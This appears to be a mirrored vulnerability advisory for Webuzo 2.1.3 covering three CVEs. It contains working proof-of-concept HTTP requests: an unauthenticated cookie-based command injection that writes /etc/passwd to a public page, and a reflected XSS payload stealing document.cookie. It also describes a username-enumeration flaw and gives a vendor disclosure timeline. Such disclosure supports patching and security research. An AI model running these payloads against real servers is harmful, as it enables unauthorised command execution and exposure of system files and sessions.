Skip to content
cyberexploits
webappphptext

Webuzo 2.1.3 - Multiple Vulnerabilities

Webuzo 2.1.3 - Multiple Vulnerabilities

Published on 2014-02-28

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/php/webapps/31982.txt7eac4c3a
raw
# Exploit Title: Webuzo Multiple Vulnerabilities

# Date: 7 October 2013

# Exploit Author: Mahendra

# Vendor Homepage: www.webuzo.com

# Software Link: http://downloads.webuzo.com/va.php

# Version: 2.1.3, other version might be vulnerable.

# Tested on: CentOS release 6.2 (FINAL)

# CVE : CVE-2013-6041, CVE-2013-6042, CVE-2013-6043



----------------------------------------------------



----------------------------------------------------





*Advisory details*



Webuzo 2.1.3 has been identified with multiple security vulnerabilities, which can be exploited to perform remote OS command injection, execute malicious script and enumerate users.



Authentication is not required to exploit these issues.





*Proof of Concept (PoC)*



----------------------------------------------------

Remote OS Command Injection (Webuzo) - CVE-2013-6041

----------------------------------------------------



GET /index.php?act=login HTTP/1.1

Host: xx.xx.xx.xx:2002

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Cookie: SOFTCookies7972_sid=[this is your cookie value]`cat /etc/passwd > /home/admin/public_html/pwned.html`

Connection: keep-alive

Cache-Control: max-age=0



--------------------------------------------------------------------

Reflected Cross-site scripting (File Manager module) - CVE-2013-6042

--------------------------------------------------------------------



Eventhough the user parameter is not validated properly which resulted in XSS, there are sets of security protection in place provided by vendor. There is security token which randomly generated, however the token is passed via URL and HTTPS is not enforced by default. The vendor also claims that the token is assigned only to a particular IP address which will logout the user if the token is used by another IP address.



This issue can be considered as informational or very low risk issue depending on the environment setup and method used by attacker to obtain the token.





HTTP Request		: POST

Affected parameter	: user

URL/page			: /filemanager/login.php

Payload				: 1" onmouseover=alert(document.cookie) pwned="



POST /sesseisbp4bciukbenlo/filemanager/login.php HTTP/1.1

Host: xx.xx.xx.xx:2002

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://xx.xx.xx.xx:2002/sesseisbp4bciukbenlo/filemanager/login.php

Cookie: navphp=ajax; navphp_cols=9; catforums=2; catblogs=2; catwikis=2; catcalendars=2; catgames=2; catmail=2; catpolls=2; catfiles=2; SOFTCookies7972_sid=eisbp4bciukbenlouewpgmwjlgchervf; PHPSESSID=28u75itaq1gob5it0lfb7cesg5

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 86

 

user=1"+onmouseover=alert(document.cookie)+pwned="&passwd=asd&action=Login



----------------------------------------------------

Username enumeration - CVE-2013-6043

----------------------------------------------------

1. Valid username and invalid password -> application returns “The username and password you entered is incorrect”

2. Invalid username and password -> application returns “The Webuzo username you entered is invalid"







*Advisory Timeline*

02-10-2013: Vendor notified

02-10-2013: Vendor acknowledged issues.

03-10-2013: Vendor released new version 2.1.4 - http://www.softaculous.com/board/index.php?tid=4526&title=Webuzo_2.1.4_Launched

10-10:2013: This advisory is published
View on GitHub